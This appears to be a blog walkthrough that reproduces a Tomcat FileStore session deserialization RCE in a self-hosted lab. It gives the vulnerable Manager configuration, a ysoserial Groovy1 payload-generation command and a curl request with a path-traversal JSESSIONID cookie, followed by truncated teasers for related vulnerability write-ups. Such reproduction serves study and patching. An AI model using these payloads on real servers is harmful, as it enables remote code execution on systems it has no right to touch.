tags: WEB security Middleware vulnerability recurrence Vulnerability recurrence tomcat Security breach information security
study hard, improve every day
Apache Tomcat is an open source Java-based web application software container that runs servlet and JSP web application software.
RCE caused by misconfiguration and LFI and deserialization vulnerabilities of org.apache.catalina.session.FileStore.
When org.apache.catalina.session.PersistentManager is configured and org.apache.catalina.session.FileStore is used to store the session, the user can use an LFI vulnerability in org.apache.catalina.session.FileStore to read anything on the server Files ending in .session. Then run the .session file through deserialization.
The default is to use org.apache.catalina.session.StandardManager to store sessions in memory, while PersistentManager swaps out unused sessions to reduce memory usage.
10.0.0-M1 to 10.0.0-M4
9.0.0.M1 to 9.0.34
8.5.0 to 8.5.54
7.0.0 to 7.0.103
10.0.0-M4 is used here
I built tomcat on my kali, so I still attack myself, the source and destination IP are both 192.168.239.139
Here to use tomcat, groovy and deserialization tool ysoserial
tomcat build
access
https://repo1.maven.org/maven2/org/apache/tomcat/tomcat/10.0.0-M4/
I downloaded tar.gz
Then put it in kali, unzip

Modify tomcat/conf/context.xlm, add Manager, and add
<Manager className="org.apache.catalina.session.PersistentManager">
<Store className="org.apache.catalina.session.FileStore" directory="/tomcat/sessions/"/>
</Manager>
The contest.xlm after joining is

Download groovy-2.3.9.jar
https://mvnrepository.com/artifact/org.codehaus.groovy/groovy/2.3.9
Also choose, I am a big person, only after verification code verification can be downloaded, I download the jar package here

Put it in tomcat's lib

Enter the bin directory of tomcat and execute the startup command to start tomcat
./catalina.sh start

Use the ysoserial tool to attack, you need to download the ysoserial jar package in advance, download address
https://jitpack.io/com/github/frohoff/ysoserial/master-30099844c6-1/ysoserial-master-30099844c6-1.jar
After downloading, execute
java -jar ysoserial-master-30099844c6-1.jar Groovy1 "touch /tmp/cve-2020-9484" > /tmp/test.session
Re-execute, because my tomcat is built on kali, I will fill in my own IP here
curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../tmp/test'
Check whether the touch command is executed successfully
ls /tmp

Vulnerability notice It can be seen that the utilization conditions are more demanding, and certain configurations need to be made when reproducing Modify the PersistenceManager configuration. This co...
Origin of recurrence: Recently, I have encountered more and more Apache Tomcat middleware in the project, so I am concerned. Thinking about making a tidy. Summarize and reproduce several major and hig...
java.lang.ClassNotFoundException: weblogic.jndi.WLInitialContextFactory Solution: wlclient.jar reference: https://stackoverflow.com/questions/756029/where-is-class-weblogic-jndi-wlinitialcontextfactor...
Vulnerability description Liferay is an open source Portal product that provides content integration of multiple independent systems, and provides a complete solution for the integration of corporate ...
0x00 vulnerability background On June 23, 2020, Apache Dubbo officially released a risk notice for Apache Dubbo's remote code execution. The vulnerability number is CVE-2020-1948, and the vulnerabilit...
1. Conditions 1) The attacker can control the file name/file content on the server 2) Tomcat context is configured with persistencemanager fileSotre 3) persistenceManager is configured with sessionAtt...
CVE-2020-7961: Liferay Portal deserialization vulnerability analysis 360CERT [ ] (javascript: void (0) Nowadays Author: Hu3sky @ 360CERT New media housekeeper typography On March 20, 2020, Code White ...
Author: Longofo @ 404 Year-known laboratory Time: March 27, 2020 Original address:https://paper.seebug.org/1162/ English version:https://paper.seebug.org/1163/ Previously published an article on CODE ...
Impact version Oracle Coherence 3.7.1.17 Oracle Coherence 12.1.3.0.0 Oracle Coherence 12.2.1.3.0.0 Oracle Coherence 12.2.1.4.0.0 Vulnerability building Run the installation as an administrator java -j...
CVE-2020-2555: Oracle Coherence deserialization RCE recurrence Original PingPig [Timeline Sec](javascript:void(0)Nowadays Click on the blue font above to follow us and learn safety together! Author: P...